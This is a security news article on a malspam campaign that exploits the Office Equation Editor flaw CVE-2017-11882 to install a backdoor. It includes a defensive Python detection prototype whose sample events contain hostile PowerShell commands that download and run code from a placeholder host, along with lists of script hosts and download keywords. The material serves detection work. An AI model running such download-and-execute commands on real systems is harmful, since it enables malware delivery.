Microsoft is warning users to be on the lookout for a malspam campaign that’s abusing an Office vulnerability in order to distribute a backdoor.
On 7 June, Microsoft Security Intelligence took to Twitter to raise awareness of the operation. The campaign, which remains active as of this writing, begins when users receive a malspam email in one of several European languages. Each of these emails attempts to trick the recipient into opening an attached RTF document.
An active malware campaign using emails in European languages distributes RTF files that carry the CVE-2017-11882 exploit, which allows attackers to automatically run malicious code without requiring user interaction.
— Microsoft Security Intelligence (@MsftSecIntel) June 7, 2019
This file moves the infection chain forward by exploiting CVE-2017-11882. Fixed by Microsoft in November 2017, the vulnerability is a stack-based overflow flaw in Microsoft Equation Editor (EQNEDT32.EXE). Because the flaw lives in that component, digital security firm Embedi found that it affected all versions of Microsoft Office and Microsoft Windows, on every architecture, dating back to 2000.
The security weakness enables a bad actor to execute arbitrary code on a vulnerable machine. In Embedi’s analysis, for instance, researchers found that an attacker could easily launch a file from a WebDAV server under their control, and could use an OLE auto-update to exploit the flaw without any user interaction. Just a few weeks after Microsoft issued its fix, researchers spotted another campaign leveraging a component of the Cobalt Strike penetration-testing tool to abuse the vulnerability and infect unpatched systems with malware.
In this new wave of attacks, the malicious RTF file downloads and then runs VBScript, PowerShell and other scripts, which in turn download a backdoor payload. The backdoor then attempts to connect to a malicious domain, which was down at the time of Microsoft Security Intelligence’s warning.
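As an added example (not Microsoft's detection content, nor code from the campaign), the following Python prototype applies that chain to constructed process-creation events in an assumed "Key: value|Key: value" export format: it flags Equation Editor (EQNEDT32.EXE) launching a script host, Equation Editor launching anything at all, and an Office application launching a script host whose command line downloads something. The process names, download hints and sample events are assumptions of the example, not values taken from the advisory.

```python
from typing import List, Optional, Tuple

# Equation Editor is the process the CVE-2017-11882 exploit code executes inside.
EQUATION_EDITOR = "eqnedt32.exe"
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts the chain uses to fetch the next stage and the backdoor (assumed set).
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Fragments that usually appear when a script stage pulls a payload from the internet.
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "xmlhttp", "http://")

# Constructed sample events (placeholder paths and domain) in the assumed export format.
SAMPLE_LOG = [
    r"ParentImage: C:\Windows\explorer.exe|Image: C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|CommandLine: WINWORD.EXE /n C:\Users\a\invoice.rtf",
    r"ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|Image: C:\Windows\System32\cmd.exe|CommandLine: cmd /c powershell -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s1')",
    r"ParentImage: C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine: powershell -c (New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/b.exe','C:\Users\a\AppData\Local\Temp\b.exe')",
]

def parse_event(line: str) -> dict:
    """Split one 'Key: value|Key: value' line into a dict (the first colon ends the key)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(":")
        fields[key.strip()] = value.strip()
    return fields

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> Optional[str]:
    """Severity for one event: 'critical' = Equation Editor spawned a script host,
    'high' = Equation Editor spawned anything else (it has no reason to start processes),
    'medium' = an Office app started a script host with a download command; else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "").lower()
    if parent == EQUATION_EDITOR:
        return "critical" if child in SCRIPT_HOSTS else "high"
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS and any(h in cmdline for h in DOWNLOAD_HINTS):
        return "medium"
    return None

def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (severity, child process name) for every line that matches a rule."""
    hits = []
    for line in lines:
        event = parse_event(line)
        severity = classify(event)
        if severity:
            hits.append((severity, basename(event.get("Image", ""))))
    return hits
```

Feeding real Sysmon or EDR process-creation events through the same rules only requires swapping `parse_event` for the format your collector emits; the 'high' tier is deliberately broad because a patched Equation Editor never needs to launch child processes.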
The fact that attackers continue to leverage exploit code for old vulnerabilities like CVE-2017-11882 highlights the need for organizations to keep their software up to date by investing in their vulnerability management capabilities. They might also want to consider strengthening their ability to detect advanced malware that leverages software flaws as an attack vector.